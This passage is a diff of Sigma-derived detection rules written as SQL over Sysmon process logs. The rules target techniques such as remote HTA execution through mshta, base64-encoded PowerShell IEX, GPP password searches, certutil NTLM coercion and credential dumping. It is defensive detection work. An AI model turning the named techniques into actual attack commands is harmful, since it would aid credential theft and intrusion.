'%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s 
NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "status": "experimental", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' 
ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR 
CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of X509Enrollment", "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_x509enrollment.yml" + }, + { + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + 
"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ - "There legitimate reasons to export certificates. 
Investigate the activity to determine if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", - "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.g0030", + "attack.g0050", + "attack.s0081", 
"attack.execution", - "attack.t1218.005" + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. 
Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrators might use this command to update Sysmon configuration." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + ], + "filename": "proc_creation_win_hktl_safetykatz.yml" + }, + { + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - 
"attack.t1218" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], "falsepositives": [ - 
"Legitimate scripts that use IEX" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ 
- "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "description": "Detects a certain command line flag combination used by regsvr32 
